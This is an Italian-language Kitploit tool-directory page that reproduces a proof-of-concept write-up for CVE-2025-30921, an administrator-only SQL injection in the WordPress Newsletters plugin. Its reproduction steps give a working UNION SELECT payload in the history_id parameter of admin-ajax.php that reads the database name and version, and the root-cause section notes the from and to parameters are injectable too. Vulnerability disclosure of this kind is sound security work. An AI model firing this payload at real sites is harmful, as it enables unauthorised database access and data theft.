Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-30921 — PoC di CVE-2025-30921 | Kitploit
Strumenti/GitHubGitHub/dottak/cve-2025-30921
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubdottak/cve-2025-30921

CVE-2025-30921

PoC di CVE-2025-30921

Vedi Repository
11401 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-30921

1️⃣ Tipo di componente

Plugin WordPress

2️⃣ Dettagli del componente

Nome del componente Newsletters

Versione vulnerabile <= 4.9.9.7

Slug del componente newsletters-lite

Link del componente https://wordpress.org/plugins/newsletters-lite/

3️⃣ OWASP 2017: TOP 10

Classe di vulnerabilità A3: Injection

Tipo di vulnerabilità SQL Injection

4️⃣ Prerequisito

Amministratore

5️⃣

Scarica lo strumento
Dettagli della vulnerabilità

👉 Breve descrizione

Quando si visualizza il grafico di panoramica delle statistiche nella dashboard del plugin (/wp-admin/admin.php?page=newsletters) del plugin Newsletters versione 4.9.9.7 o inferiore, si verifica una vulnerabilità di SQL Injection dovuta a una convalida insufficiente dell'input e a una gestione di escaping inadeguata dei parametri URL.

Tramite questa vulnerabilità, un attaccante con privilegi di amministratore può sfruttarla per estrarre informazioni dal database del sito target.

👉 Come riprodurre (PoC)

  1. Preparare un sito WordPress con il plugin Newsletters versione 4.9.9.7 o inferiore installato.

  2. Navigare fino al menu della dashboard del plugin Newsletters (/wp-admin/admin.php?page=newsletters).

    image

  3. Utilizzando gli strumenti di sviluppo del browser, cercare action=wpmlwelcomestats&security= nella scheda 'Elements' e controllare il valore di security. Ad esempio, se il risultato della ricerca appare come mostrato di seguito, annotare 22b1ac0de6.

    root@kitploit:~
    // ...
    
    jQuery.getJSON(newsletters_ajaxurl + 'action=wpmlwelcomestats&security=22b1ac0de6', ajaxdata, function(json) {
    
    // ...
    

    image

  4. Inserire il valore di security annotato nella sezione <SECURITY VALUE> del percorso URL qui sotto e inviare una richiesta a quell'URL

    root@kitploit:~
    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=<SECURITY VALUE>&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23
    

    Tra i parametri URL, history_id contiene il payload dell'SQL Injection, che consente di interrogare il nome del database (DATABASE()) e la versione (@@VERSION). Ad esempio, quando il valore di security è 22b1ac0de6, accedere al seguente URL.

    http://localhost:8080/wp-admin/admin-ajax.php?action=wpmlwelcomestats&security=22b1ac0de6&type=years&chart=bar&from=2024-12-31&to=2024-12-31&history_id=FOO%27+UNION+SELECT+(CONCAT((DATABASE()),%22-%22,(@@VERSION))),NULL+LIMIT+1,2+%23

  5. Quando si controlla la risposta alla richiesta URL, si può confermare che le informazioni sul nome del database e sulla versione sono esposte a causa della vulnerabilità di SQL Injection attraverso il parametro history_id.

    image

👉 Informazioni aggiuntive (opzionale)

[Causa principale della vulnerabilità]

Quando si richiede l'URL in cui si verifica la vulnerabilità di SQL Injection nel PoC precedente, viene chiamata la funzione ajax_welcomestats all'interno del file /wp-content/plugins/newsletters-lite/wp-mailinglist-plugin.php.

A questo punto, il parametro di richiesta history_id viene direttamente referenziato come clausola di condizione nella stringa della query SQL e inizializzato come variabile $history_condition. Questa variabile viene poi passata alla query del database senza alcun trattamento di escaping.

image

Pertanto, poiché non esiste alcuna convalida o trattamento di escaping per i valori inseriti nel parametro URL history_id, si verifica una vulnerabilità di SQL Injection. (Si noti che anche i parametri URL from e to sono vulnerabili ad attacchi di SQL Injection a causa di una convalida dell'input e di un trattamento di escaping insufficienti.)

6️⃣ Demo dell'exploit

video

7️⃣ Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2025-30921